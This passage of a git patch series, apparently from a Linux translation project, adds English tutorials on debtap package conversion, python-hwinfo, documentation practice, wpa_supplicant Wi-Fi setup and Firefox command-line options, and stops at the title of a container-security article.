+ download complete: extra [ 7.4 MiB 109K/s 1 remaining]
+ download complete: community [ 16.9 MiB 131K/s 0 remaining]
+:: download complete in 131.47s < 27.1 MiB 211K/s 6 files >
+:: waiting for 1 process to finish repacking repos...
+==> Synchronizing debtap database...
+ % Total % Received % Xferd Average Speed Time Time Time Current
+ Dload Upload Total Spent Left Speed
+100 34.1M 100 34.1M 0 0 206k 0 0:02:49 0:02:49 --:--:-- 180k
+ % Total % Received % Xferd Average Speed Time Time Time Current
+ Dload Upload Total Spent Left Speed
+100 814k 100 814k 0 0 101k 0 0:00:08 0:00:08 --:--:-- 113k
+ % Total % Received % Xferd Average Speed Time Time Time Current
+ Dload Upload Total Spent Left Speed
+100 120k 100 120k 0 0 61575 0 0:00:02 0:00:02 --:--:-- 52381
+ % Total % Received % Xferd Average Speed Time Time Time Current
+ Dload Upload Total Spent Left Speed
+100 35.4M 100 35.4M 0 0 175k 0 0:03:27 0:03:27 --:--:-- 257k
+==> Downloading latest virtual packages list...
+ % Total % Received % Xferd Average Speed Time Time Time Current
+ Dload Upload Total Spent Left Speed
+100 149 0 149 0 0 49 0 --:--:-- 0:00:03 --:--:-- 44
+100 11890 0 11890 0 0 2378 0 --:--:-- 0:00:05 --:--:-- 8456
+==> Downloading latest AUR packages list...
+ % Total % Received % Xferd Average Speed Time Time Time Current
+ Dload Upload Total Spent Left Speed
+100 264k 0 264k 0 0 30128 0 --:--:-- 0:00:09 --:--:-- 74410
+==> Generating base group packages list...
+==> All steps successfully completed!
+```
+
+You must run the above command at least once.
+
+Now, it's time for package conversion.
+
+To convert any DEB package, say **Quadrapassel**, to an Arch Linux package using debtap, do:
+```
+debtap quadrapassel_3.22.0-1.1_arm64.deb
+```
+
+The above command will convert the given .deb file into an Arch Linux package. You will be asked to enter the name of the package maintainer and the license. Just enter them and hit the ENTER key to start the conversion process.
+
+The package conversion will take from a few seconds to several minutes depending upon your CPU speed. Grab a cup of coffee.
+
+Sample output would be:
+```
+==> Extracting package data...
+==> Fixing possible directories structure differencies...
+==> Generating .PKGINFO file...
+
+:: Enter Packager name:
+**quadrapassel**
+
+:: Enter package license (you can enter multiple licenses comma separated):
+**GPL**
+
+*** Creation of .PKGINFO file in progress. It may take a few minutes, please wait...
+
+Warning: These dependencies (depend = fields) could not be translated into Arch Linux packages names:
+gsettings-backend
+
+== > Checking and generating .INSTALL file (if necessary)...
+
+:: If you want to edit .PKGINFO and .INSTALL files (in this order), press (1) For vi (2) For nano (3) For default editor (4) For a custom editor or any other key to continue:
+
+==> Generating .MTREE file...
+
+==> Creating final package...
+==> Package successfully created!
+==> Removing leftover files...
+```
+
+**Note:** The Quadrapassel package is already available in the Arch Linux official repositories. I used it just for demonstration purposes.
+
+If you don't want to answer any questions during package conversion, use the **-q** flag to bypass all questions, except for editing metadata file(s).
+```
+debtap -q quadrapassel_3.22.0-1.1_arm64.deb
+```
+
+To bypass all questions (not recommended though), use the -Q flag.
+```
+debtap -Q quadrapassel_3.22.0-1.1_arm64.deb
+```
+
+Once the conversion is done, you can install the newly converted package using "pacman" in your Arch system as shown below.
+```
+sudo pacman -U <path-to-converted-package>.pkg.tar.xz
+```
+
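+Before installing, it may be worth inspecting what the converted package actually contains. A hedged sketch using pacman's file-query flags (the package file name below is just a placeholder):
+```
+# show the metadata embedded in the converted package file
+pacman -Qip quadrapassel-3.22.0-1.1-x86_64.pkg.tar.xz
+
+# list the files it would install
+pacman -Qlp quadrapassel-3.22.0-1.1-x86_64.pkg.tar.xz
+```
+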
+To display the help section, use the **-h** flag:
+```
+$ debtap -h
+Syntax: debtap [options] package_filename
+
+Options:
+
+ -h --h -help --help Prints this help message
+ -u --u -update --update Update debtap database
+ -q --q -quiet --quiet Bypass all questions, except for editing metadata file(s)
+ -Q --Q -Quiet --Quiet Bypass all questions (not recommended)
+ -s --s -pseudo --pseudo Create a pseudo-64-bit package from a 32-bit .deb package
+ -w --w -wipeout --wipeout Wipeout versions from all dependencies, conflicts etc.
+ -p --p -pkgbuild --pkgbuild Additionally generate a PKGBUILD file
+ -P --P -Pkgbuild --Pkgbuild Generate a PKGBUILD file only
+```
+
+And, that's all for now, folks. Hope this utility helps. If you find our guides useful, please spend a moment to share them on your social and professional networks and support OSTechNix!
+
+More good stuff to come. Stay tuned!
+
+Cheers!
+
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.ostechnix.com/convert-deb-packages-arch-linux-packages/
+
+作者:[SK][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.ostechnix.com/author/sk/
+[1]:https://www.ostechnix.com/build-linux-packages-multiple-platforms-easily/
+[2]:https://www.ostechnix.com/build-packages-source-using-checkinstall/
+[3]:https://www.ostechnix.com/install-pacaur-arch-linux/
+[4]:https://www.ostechnix.com/install-packer-arch-linux-2/
+[5]:https://www.ostechnix.com/install-yaourt-arch-linux/
From 7c8236409ee82c347232b1f28bc4dea67e374477 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 13:27:48 +0800
Subject: [PATCH 081/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20python-hwinfo=20:?=
=?UTF-8?q?=20Display=20Summary=20Of=20Hardware=20Information=20In=20Linux?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...ummary Of Hardware Information In Linux.md | 176 ++++++++++++++++++
1 file changed, 176 insertions(+)
create mode 100644 sources/tech/20171005 python-hwinfo - Display Summary Of Hardware Information In Linux.md
diff --git a/sources/tech/20171005 python-hwinfo - Display Summary Of Hardware Information In Linux.md b/sources/tech/20171005 python-hwinfo - Display Summary Of Hardware Information In Linux.md
new file mode 100644
index 0000000000..f92c52f3cf
--- /dev/null
+++ b/sources/tech/20171005 python-hwinfo - Display Summary Of Hardware Information In Linux.md
@@ -0,0 +1,176 @@
+python-hwinfo : Display Summary Of Hardware Information In Linux
+======
+To date, we have covered most of the utilities that discover Linux system hardware information & configuration, but there are still plenty of commands available for the same purpose.
+
+Among them, some utilities display detailed information about all the hardware components, while the rest show only specific device information.
+
+In this series, today we are going to discuss [python-hwinfo][1], one of the tools that displays a summary of hardware information and its configuration in a neat way.
+
+### What's python-hwinfo
+
+This is a python library for inspecting hardware and devices by parsing the outputs of system utilities such as lspci and dmidecode.
+
+It offers a simple CLI tool which can be used to inspect local, remote, and captured hosts. Run the command with sudo to get maximum information.
+
+Additionally, you can run it against a remote server by providing the server IP or hostname, a username, and a password. You can also use this tool to view captured outputs from other utilities, for example dmidecode saved as 'dmidecode.out', /proc/cpuinfo saved as 'cpuinfo', lspci -nnm saved as 'lspci-nnm.out', etc.
+
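+For example, such captures could be produced with the standard tools themselves; a minimal sketch, using the file names mentioned above:
+```
+$ sudo dmidecode > dmidecode.out
+$ cat /proc/cpuinfo > cpuinfo
+$ lspci -nnm > lspci-nnm.out
+
+```
+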
+**Suggested Read :**
+**(#)** [inxi - A Great Tool to Check Hardware Information on Linux][2]
+**(#)** [Dmidecode - Easy Way To Get Linux System Hardware Information][3]
+**(#)** [LSHW (Hardware Lister) - A Nifty Tool To Get A Hardware Information On Linux][4]
+**(#)** [hwinfo (Hardware Info) - A Nifty Tool To Detect System Hardware Information On Linux][5]
+**(#)** [How To Use lspci, lsscsi, lsusb, And lsblk To Get Linux System Devices Information][6]
+
+### How to Install python-hwinfo in Linux
+
+It can be installed via pip on all major Linux distributions. In order to install python-hwinfo, make sure your system has the python and python-pip packages as prerequisites.
+
+pip is a Python module bundled with setuptools; it's one of the recommended tools for installing Python packages on Linux.
+
+For **`Debian/Ubuntu`** , use [APT-GET Command][7] or [APT Command][8] to install pip.
+```
+$ sudo apt install python-pip
+
+```
+
+For **`RHEL/CentOS`** , use [YUM Command][9] to install pip.
+```
+$ sudo yum install python-pip python-devel
+
+```
+
+For **`Fedora`** , use [DNF Command][10] to install pip.
+```
+$ sudo dnf install python-pip
+
+```
+
+For **`Arch Linux`** , use [Pacman Command][11] to install pip.
+```
+$ sudo pacman -S python-pip
+
+```
+
+For **`openSUSE`** , use [Zypper Command][12] to install pip.
+```
+$ sudo zypper install python-pip
+
+```
+
+Finally, run the following pip command to install python-hwinfo.
+```
+$ sudo pip install python-hwinfo
+
+```
+
+### How to Use python-hwinfo on a local machine
+
+Execute the following command to inspect the hardware present on the local machine. The output is clear and neat, which I haven't seen in any other command.
+
+It categorizes the output into five classes.
+
+ * **`Bios Info:`** It contains bios_vendor_name, system_product_name, system_serial_number, system_uuid, system_manufacturer, bios_release_date, and bios_version
+ * **`CPU Info:`** It displays the number of processors, vendor_id, cpu_family, model, stepping, model_name, and cpu_mhz
+ * **`Ethernet Controller Info:`** It shows device_bus_id, vendor_name, vendor_id, device_name, device_id, subvendor_name, subvendor_id, subdevice_name, and subdevice_id
+ * **`Storage Controller Info:`** It shows vendor_name, vendor_id, device_name, device_id, subvendor_name, subvendor_id, subdevice_name, and subdevice_id
+ * **`GPU Info:`** It shows vendor_name, vendor_id, device_name, device_id, subvendor_name, subvendor_id, subdevice_name, and subdevice_id
+
+
+```
+$ sudo hwinfo
+
+Bios Info:
+
++----------------------|--------------------------------------+
+| Key | Value |
++----------------------|--------------------------------------+
+| bios_vendor_name | IBM |
+| system_product_name | System x3550 M3: -[6102AF1]- |
+| system_serial_number | RS2IY21 |
+| chassis_type | Rack Mount Chassis |
+| system_uuid | 4C4C4544-0051-3210-8052-B2C04F323132 |
+| system_manufacturer | IBM |
+| socket_count | 2 |
+| bios_release_date | 10/21/2014 |
+| bios_version | -[VLS211TSU-2.51]- |
+| socket_designation | Socket 1, Socket 2 |
++----------------------|--------------------------------------+
+
+CPU Info:
+
++-----------|--------------|------------|-------|----------|------------------------------------------|----------+
+| processor | vendor_id | cpu_family | model | stepping | model_name | cpu_mhz |
++-----------|--------------|------------|-------|----------|------------------------------------------|----------+
+| 0 | GenuineIntel | 6 | 45 | 7 | Intel(R) Xeon(R) CPU E5-1607 0 @ 3.00GHz | 1200.000 |
+| 1 | GenuineIntel | 6 | 45 | 7 | Intel(R) Xeon(R) CPU E5-1607 0 @ 3.00GHz | 1200.000 |
+| 2 | GenuineIntel | 6 | 45 | 7 | Intel(R) Xeon(R) CPU E5-1607 0 @ 3.00GHz | 1200.000 |
+| 3 | GenuineIntel | 6 | 45 | 7 | Intel(R) Xeon(R) CPU E5-1607 0 @ 3.00GHz | 1200.000 |
+| 4 | GenuineIntel | 6 | 45 | 7 | Intel(R) Xeon(R) CPU E5-2650 0 @ 2.00GHz | 1200.000 |
++-----------|--------------|------------|-------|----------|------------------------------------------|----------+
+
+Ethernet Controller Info:
+
++-------------------|-----------|---------------------------------|-----------|-------------------|--------------|---------------------------------|--------------+
+| vendor_name | vendor_id | device_name | device_id | subvendor_name | subvendor_id | subdevice_name | subdevice_id |
++-------------------|-----------|---------------------------------|-----------|-------------------|--------------|---------------------------------|--------------+
+| Intel Corporation | 8086 | I350 Gigabit Network Connection | 1521 | Intel Corporation | 8086 | I350 Gigabit Network Connection | 1521 |
++-------------------|-----------|---------------------------------|-----------|-------------------|--------------|---------------------------------|--------------+
+
+Storage Controller Info:
+
++-------------------|-----------|----------------------------------------------|-----------|----------------|--------------|----------------|--------------+
+| vendor_name | vendor_id | device_name | device_id | subvendor_name | subvendor_id | subdevice_name | subdevice_id |
++-------------------|-----------|----------------------------------------------|-----------|----------------|--------------|----------------|--------------+
+| Intel Corporation | 8086 | C600/X79 series chipset IDE-r Controller | 1d3c | Dell | 1028 | [Device 05d2] | 05d2 |
+| Intel Corporation | 8086 | C600/X79 series chipset SATA RAID Controller | 2826 | Dell | 1028 | [Device 05d2] | 05d2 |
++-------------------|-----------|----------------------------------------------|-----------|----------------|--------------|----------------|--------------+
+
+GPU Info:
+
++--------------------|-----------|-----------------------|-----------|--------------------|--------------|----------------|--------------+
+| vendor_name | vendor_id | device_name | device_id | subvendor_name | subvendor_id | subdevice_name | subdevice_id |
++--------------------|-----------|-----------------------|-----------|--------------------|--------------|----------------|--------------+
+| NVIDIA Corporation | 10de | GK107GL [Quadro K600] | 0ffa | NVIDIA Corporation | 10de | [Device 094b] | 094b |
++--------------------|-----------|-----------------------|-----------|--------------------|--------------|----------------|--------------+
+
+```
+
+### How to Use python-hwinfo on a remote machine
+
+Execute the following command to inspect the hardware present on a remote machine; it requires the remote server's IP, a username, and a password.
+```
+$ hwinfo -m x.x.x.x -u root -p password
+
+```
+
+### How to Use python-hwinfo to read captured outputs
+
+Execute the following command to inspect the hardware described in a previously captured output file.
+```
+$ hwinfo -f [Path to file]
+
+```
+
+--------------------------------------------------------------------------------
+
+via: https://www.2daygeek.com/python-hwinfo-check-display-system-hardware-configuration-information-linux/
+
+作者:[2DAYGEEK][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.2daygeek.com/author/2daygeek/
+[1]:https://github.com/rdobson/python-hwinfo
+[2]:https://www.2daygeek.com/inxi-system-hardware-information-on-linux/
+[3]:https://www.2daygeek.com/dmidecode-get-print-display-check-linux-system-hardware-information/
+[4]:https://www.2daygeek.com/lshw-find-check-system-hardware-information-details-linux/
+[5]:https://www.2daygeek.com/hwinfo-check-display-detect-system-hardware-information-linux/
+[6]:https://www.2daygeek.com/check-system-hardware-devices-bus-information-lspci-lsscsi-lsusb-lsblk-linux/
+[7]:https://www.2daygeek.com/apt-get-apt-cache-command-examples-manage-packages-debian-ubuntu-systems/
+[8]:https://www.2daygeek.com/apt-command-examples-manage-packages-debian-ubuntu-systems/
+[9]:https://www.2daygeek.com/yum-command-examples-manage-packages-rhel-centos-systems/
+[10]:https://www.2daygeek.com/dnf-command-examples-manage-packages-fedora-system/
+[11]:https://www.2daygeek.com/pacman-command-examples-manage-packages-arch-linux-system/
+[12]:https://www.2daygeek.com/zypper-command-examples-manage-packages-opensuse-system/
From 131abb1fb5bf911f110fb679ca390e2ff30ea5ae Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 13:31:27 +0800
Subject: [PATCH 082/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=207=20deadly=20sins?=
=?UTF-8?q?=20of=20documentation?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...20171006 7 deadly sins of documentation.md | 85 +++++++++++++++++++
1 file changed, 85 insertions(+)
create mode 100644 sources/tech/20171006 7 deadly sins of documentation.md
diff --git a/sources/tech/20171006 7 deadly sins of documentation.md b/sources/tech/20171006 7 deadly sins of documentation.md
new file mode 100644
index 0000000000..5f2005c764
--- /dev/null
+++ b/sources/tech/20171006 7 deadly sins of documentation.md
@@ -0,0 +1,85 @@
+7 deadly sins of documentation
+======
+![](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/osdc-lead-cat-writing-king-typewriter-doc.png?itok=afaEoOqc)
+Documentation seems to be a perennial problem in operations. Everyone agrees that it's important to have, but few believe that their organizations have all the documentation they need. Effective documentation practices can improve incident response, speed up onboarding, and help reduce technical debt--but poor documentation practices can be worse than having no documentation at all.
+
+### The 7 sins
+
+Do any of the following scenarios sound familiar?
+
+ * You've got a wiki. And a Google Doc repository. And GitHub docs. And a bunch of text files in your home directory. And notes about problems in email.
+ * You have a doc that explains everything about a service, and you're sure that the information you need to fix this incident in there ... somewhere.
+ * You've got a 500-line Puppet manifest to handle this service ... with no comments. Or comments that reference tickets from two ticketing systems ago.
+ * You have a bunch of archived presentations that discuss all sorts of infrastructure components, but you're not sure how up-to-date they are because you haven't had time to watch them in ages.
+ * You bring someone new into the team and they spend a month asking what various pieces of jargon mean.
+ * You search your wiki and find three separate docs on how this service works, two of which contradict each other entirely, and none of which have been updated in the past year.
+
+
+
+These are all signs you may have committed at least one of the deadly sins of documentation:
+
+1\. Repository overload.
+2\. Burying the lede.
+3\. Comment neglect.
+4\. Video addiction.
+5\. Jargon overuse.
+6\. Documentation overgrowth.
+
+But if you've committed any of those sins, chances are you know this one, too:
+
+7\. One or more of the above is true, but everyone says they don't have time to work on documentation.
+
+The worst sin of all is thinking that documentation is "extra" work. Those other problems are almost always a result of this mistake. Documentation isn't extra work--it's a necessary part of every project, and if it isn't treated that way, it will be nearly impossible to do well. You wouldn't expect to get good code out of developers without a coherent process for writing, reviewing, and publishing code, and yet we often treat documentation like an afterthought, something that we assume will happen while we get our other work done. If you think your documentation is inadequate, ask yourself these questions:
+
+ * Do your projects include producing documentation as a measurable goal?
+ * Do you have a formal review process for documentation?
+ * Is documentation considered a task for senior members of the team?
+
+
+
+Those three questions can tell you a lot about whether you treat documentation as extra work or not. If people aren't given the time to write documentation, if there's no process to make sure the documentation that's produced is actually useful, or if documentation is foisted on those members of your team with the weakest grasp on the subjects being covered, it will be difficult to produce anything of decent quality.
+
+This often-dismissive attitude is pervasive in the industry. According to the [GitHub 2017 Open Source Survey][1], the number-one problem with most open source projects is incomplete or confusing documentation. But how many of those projects solicit technical writers to help improve that? How many of us in operations have a technical writer we bring in to help write or improve our documentation?
+
+### Practice makes (closer to) perfect
+
+This isn't to say that only a technical writer can produce good documentation, but writing and editing are skills like any other: We'll only get better at it if we work at it, and too few of us do. What are the concrete steps we can take to make it a real priority, as opposed to a nice-to-have?
+
+For a start, make good documentation a value that your organization champions. Just as reliability needs champions to get prioritized, documentation needs the same thing. Project plans and sprints should include delivering new documentation or updating old documentation, and allocate time for doing so. Make sure people understand that writing good documentation is just as important to their career development as writing good code.
+
+Additionally, make it easy to keep documentation up to date and for people to find the documentation they need. In this way, you can help perpetuate the virtuous circle of documentation: High-quality docs help people realize the value of documentation and provide examples to follow when they write their own, which in turn will encourage them to create their own.
+
+To do this, have as few repositories as possible; one or two is optimal (you might want your runbooks to be in Google Docs so they are accessible if the company wiki is down, for instance). If you have more, make sure everyone knows what each repository is for; if Google Docs is for runbooks, verify that all runbooks are there and nowhere else, and that everyone knows that. Ensure that your repositories are searchable and keep a change history, and to improve discoverability, consider adding portals that have frequently used or especially important docs surfaced for easy access. Do not depend on email, chat logs, or tickets as primary sources of documentation.
+
+Ask new and junior members of your team to review both your code and your documentation. If they don't understand what's going on in your code, or why you made the choices you did, it probably needs to be rewritten and/or commented better. If your docs aren't easy to understand without going down a rabbit hole, they probably need to be revised. Technical documentation should include concrete examples of how processes and behaviors work to help people create mental models. You may find the tips in this article helpful for improving your documentation writing: [10 tips for making your documentation crystal clear][2].
+
+When you're writing those docs, especially when it comes to runbooks, use the [inverted pyramid format][3]: The most commonly needed or most important information should be as close to the top of the page as possible. Don't combine runbook-style documents and longer-form technical reference; instead, link the two and keep them separate so that runbooks remain streamlined (but can easily be discovered from the reference, and vice versa).
+
+Using these steps in your documentation can change it from being a nice-to-have (or worse, a burden) into a force multiplier for your operations team. Good docs improve inclusiveness and knowledge transfer, helping your more inexperienced team members solve problems independently, freeing your more senior team members to work on new projects instead of firefighting or training new people. Better yet, well-written, high-quality documentation enables you and your team members to enjoy a weekend off or go on vacation without being on the hook if problems come up.
+
+Learn more in Chastity Blackwell's talk, [The 7 Deadly Sins of Documentation][4], at [LISA17][5], which will be held October 29-November 3 in San Francisco, California.
+
+### About The Author
+
+Chastity Blackwell is a Site Reliability Engineer at Yelp, with years of experience in operations.
+
+--------------------------------------------------------------------------------
+
+via: https://opensource.com/article/17/10/7-deadly-sins-documentation
+
+作者:[Chastity Blackwell][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://opensource.com/users/cblkwell
+[1]:http://opensourcesurvey.org/2017/
+[2]:https://opensource.com/life/16/11/tips-for-clear-documentation
+[3]:https://en.wikipedia.org/wiki/Inverted_pyramid_(journalism)
+[4]:https://www.usenix.org/conference/lisa17/conference-program/presentation/blackwell
+[5]:https://www.usenix.org/conference/lisa17
From a919046f9118a1d2e4f5043f3f286abf82708234 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 13:33:07 +0800
Subject: [PATCH 083/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Connect=20To=20Wi?=
=?UTF-8?q?fi=20From=20The=20Linux=20Command=20Line?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...ect To Wifi From The Linux Command Line.md | 119 ++++++++++++++++++
1 file changed, 119 insertions(+)
create mode 100644 sources/tech/20171002 Connect To Wifi From The Linux Command Line.md
diff --git a/sources/tech/20171002 Connect To Wifi From The Linux Command Line.md b/sources/tech/20171002 Connect To Wifi From The Linux Command Line.md
new file mode 100644
index 0000000000..de47cf50a8
--- /dev/null
+++ b/sources/tech/20171002 Connect To Wifi From The Linux Command Line.md
@@ -0,0 +1,119 @@
+translating by lujun9972
+Connect To Wifi From The Linux Command Line
+======
+
+### Objective
+
+Configure WiFi using only command line utilities.
+
+### Distributions
+
+This will work on any major Linux distribution.
+
+### Requirements
+
+A working Linux install with root privileges and a compatible wireless network adapter.
+
+### Difficulty
+
+Easy
+
+### Conventions
+
+ * **#** \- requires given command to be executed with root privileges either directly as a root user or by use of `sudo` command
+ * **$** \- given command to be executed as a regular non-privileged user
+
+
+
+### Introduction
+
+Lots of people like graphical utilities for managing their computers, but plenty of people don't. If you prefer command line utilities, managing WiFi can be a real pain. Well, it doesn't have to be.
+
+wpa_supplicant can be used as a command line utility. You can actually set it up easily with a simple configuration file.
+
+### Scan For Your Network
+
+If you already know your network information, you can skip this step. If not, it's a good way to figure out some info about the network you're connecting to.
+
+wpa_supplicant comes with a tool called `wpa_cli` which provides a command line interface to manage your WiFi connections. You can actually use it to set up everything, but setting up a configuration file seems a bit easier.
+
+Run `wpa_cli` with root privileges, then scan for networks.
+```
+
+# wpa_cli
+> scan
+> scan_results
+
+```
+
+The scan will take a few moments. Once it completes, `scan_results` will show you the networks in your area. Note the one you want to connect to. Type `quit` to exit.
+
+### Generate a Block and Encrypt Your Password
+
+There's an even more convenient utility that you can use to begin setting up your configuration file. It takes the name of your network and the password and creates a file with a configuration block for that network, with the password hashed into a pre-shared key so it's not stored in plain text.
+```
+
+# wpa_passphrase networkname password > /etc/wpa_supplicant/wpa_supplicant.conf
+
+```
+
+### Tailor Your Configuration
+
+Now, you have a configuration file located at `/etc/wpa_supplicant/wpa_supplicant.conf`. It's not much, just the network block with your network name and password, but you can build it out from there.
+
+Open the file in your favorite editor, and start by deleting the commented-out password line. Then, add the following line to the top of the configuration.
+```
+ctrl_interface=DIR=/var/run/wpa_supplicant GROUP=wheel
+
+```
+
+It just lets users in the `wheel` group manage wpa_supplicant. It can be convenient.
+
+Add the rest of this to the network block itself.
+
+If you're connecting to a hidden network, you can add the following line to tell wpa_supplicant to scan it first.
+```
+scan_ssid=1
+
+```
+
+Next, set the protocol and key management settings. These settings correspond to WPA2.
+```
+proto=RSN
+key_mgmt=WPA-PSK
+
+```
+
+The group and pairwise settings tell wpa_supplicant if you're using CCMP, TKIP, or both. For best security, you should only be using CCMP.
+```
+group=CCMP
+pairwise=CCMP
+
+```
+
+Finally, set the priority of the network. Higher values will connect first.
+```
+priority=10
+
+```
+
+
+![Complete WPA_Supplicant Settings][1]
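+
+Putting the pieces together, the finished file might look something like this minimal sketch (the network name is a placeholder, and the psk value should be the hash that wpa_passphrase generated for you):
+```
+ctrl_interface=DIR=/var/run/wpa_supplicant GROUP=wheel
+
+network={
+    ssid="MyNetwork"
+    # dummy value below; keep the psk line that wpa_passphrase produced
+    psk=d7940bd3fdf05d31d2f3e5a67839bbbca6e48c66a76a7276e5e348e7f4d2e4a1
+    scan_ssid=1
+    proto=RSN
+    key_mgmt=WPA-PSK
+    group=CCMP
+    pairwise=CCMP
+    priority=10
+}
+
+```
+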
+Save your configuration and restart wpa_supplicant for the changes to take effect.
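+
+How you restart it depends on your setup. A hedged sketch of two common options (the interface name wlan0 is an assumption; substitute your own):
+```
+# on systemd-based distributions, restarting the service may be enough
+sudo systemctl restart wpa_supplicant
+
+# or run the daemon by hand against the new configuration, then request a DHCP lease
+sudo wpa_supplicant -B -i wlan0 -c /etc/wpa_supplicant/wpa_supplicant.conf
+sudo dhclient wlan0
+```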
+
+### Closing Thoughts
+
+Certainly, this method isn't the best for configuring wireless networks on-the-fly, but it works very well for the networks that you connect to on a regular basis.
+
+
+--------------------------------------------------------------------------------
+
+via: https://linuxconfig.org/connect-to-wifi-from-the-linux-command-line
+
+作者:[Nick Congleton][a]
+译者:[lujun9972](https://github.com/lujun9972)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://linuxconfig.org
+[1]:https://linuxconfig.org/images/wpa-cli-config.jpg
From db36d7d80c0be5cd1dcfbd9c1779cf6c5dcdc0ec Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 13:38:28 +0800
Subject: [PATCH 084/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20The=20most=20impo?=
=?UTF-8?q?rtant=20Firefox=20command=20line=20options?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
... important Firefox command line options.md | 61 +++++++++++++++++++
1 file changed, 61 insertions(+)
create mode 100644 sources/tech/20171008 The most important Firefox command line options.md
diff --git a/sources/tech/20171008 The most important Firefox command line options.md b/sources/tech/20171008 The most important Firefox command line options.md
new file mode 100644
index 0000000000..8190be8340
--- /dev/null
+++ b/sources/tech/20171008 The most important Firefox command line options.md
@@ -0,0 +1,61 @@
+translating by lujun9972
+The most important Firefox command line options
+======
+The Firefox web browser supports a number of command line options that you can use to customize how the browser starts.
+
+You may have come upon some of them in the past, for instance the command -P "profile name" to start the browser with the specified profile, or -private to start a new private browsing session.
+
+The following guide lists important command line options for Firefox. It is not a complete list of all available options, as many are used only for specific purposes that have little to no value to users of the browser.
+
+You can find the [complete][1] listing of command line options on the Firefox Developer website. Note that many of the command line options also work in other Mozilla-based products and even in some third-party programs.
+
+### Important Firefox command line options
+
+![firefox command line][2]
+
+ **Profile specific options**
+
+ * **-CreateProfile profile name** -- This creates a new user profile, but won't start it right away.
+ * **-CreateProfile "profile name profile dir"** -- Same as above, but will specify a custom profile directory on top of that.
+ * **-ProfileManager** , or **-P** -- Opens the built-in profile manager.
+  * **-P "profile name"** -- Starts Firefox with the specified profile. The profile manager is opened if the specified profile does not exist. Works only if no other instance of Firefox is running.
+ * **-no-remote** -- Add this to the -P commands to create a new instance of the browser. This lets you run multiple profiles at the same time.
+
+
+
+ **Browser specific options**
+
+ * **-headless** -- Start Firefox in headless mode. Requires Firefox 55 on Linux, Firefox 56 on Windows and Mac OS X.
+ * **-new-tab URL** -- loads the specified URL in a new tab in Firefox.
+ * **-new-window URL** -- loads the specified URL in a new Firefox window.
+ * **-private** -- Launches Firefox in private browsing mode. Can be used to run Firefox in private browsing mode all the time.
+ * **-private-window** -- Open a private window.
+ * **-private-window URL** -- Open the URL in a new private window. If a private browsing window is open already, open the URL in that window instead.
+ * **-search term** -- Run the search using the default Firefox search engine.
+  * **-url URL** -- Load the URL in a new tab or window. Can be run without -url, and multiple URLs separated by spaces can be opened using the command.
+
+
+
+ **Other options** (see the combined example after this list)
+
+  * **-safe-mode** -- Starts Firefox in Safe Mode. You may also hold down the Shift key while opening Firefox to start the browser in Safe Mode.
+ * **-devtools** -- Start Firefox with Developer Tools loaded and open.
+ * **-inspector URL** -- Inspect the specified address in the DOM Inspector.
+ * **-jsconsole** -- Start Firefox with the Browser Console.
+ * **-tray** -- Start Firefox minimized.
+
+
+
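+To give a feel for how these switches combine in practice, here are a few illustrative invocations built only from the options listed above (example.com is just a placeholder URL):
+```
+
+$ firefox -CreateProfile testing                 # create a new profile named "testing"
+$ firefox -P "testing" -no-remote                # run a separate instance with that profile
+$ firefox -private-window https://example.com    # open the placeholder URL in a private window
+
+```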
+
+--------------------------------------------------------------------------------
+
+via: https://www.ghacks.net/2017/10/08/the-most-important-firefox-command-line-options/
+
+作者:[Martin Brinkmann][a]
+译者:[lujun9972](https://github.com/lujun9972)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.ghacks.net/author/martin/
+[1]:https://developer.mozilla.org/en-US/docs/Mozilla/Command_Line_Options
From f4b6a2a7aba392ed9f85d9aa02732b99273d6516 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 13:41:45 +0800
Subject: [PATCH 085/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=2010=20layers=20of?=
=?UTF-8?q?=20Linux=20container=20security=20|=20Opensource.com?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...nux container security - Opensource.com.md | 131 ++++++++++++++++++
1 file changed, 131 insertions(+)
create mode 100644 sources/tech/20171009 10 layers of Linux container security - Opensource.com.md
diff --git a/sources/tech/20171009 10 layers of Linux container security - Opensource.com.md b/sources/tech/20171009 10 layers of Linux container security - Opensource.com.md
new file mode 100644
index 0000000000..b992cac2c3
--- /dev/null
+++ b/sources/tech/20171009 10 layers of Linux container security - Opensource.com.md
@@ -0,0 +1,131 @@
+10 layers of Linux container security | Opensource.com
+======
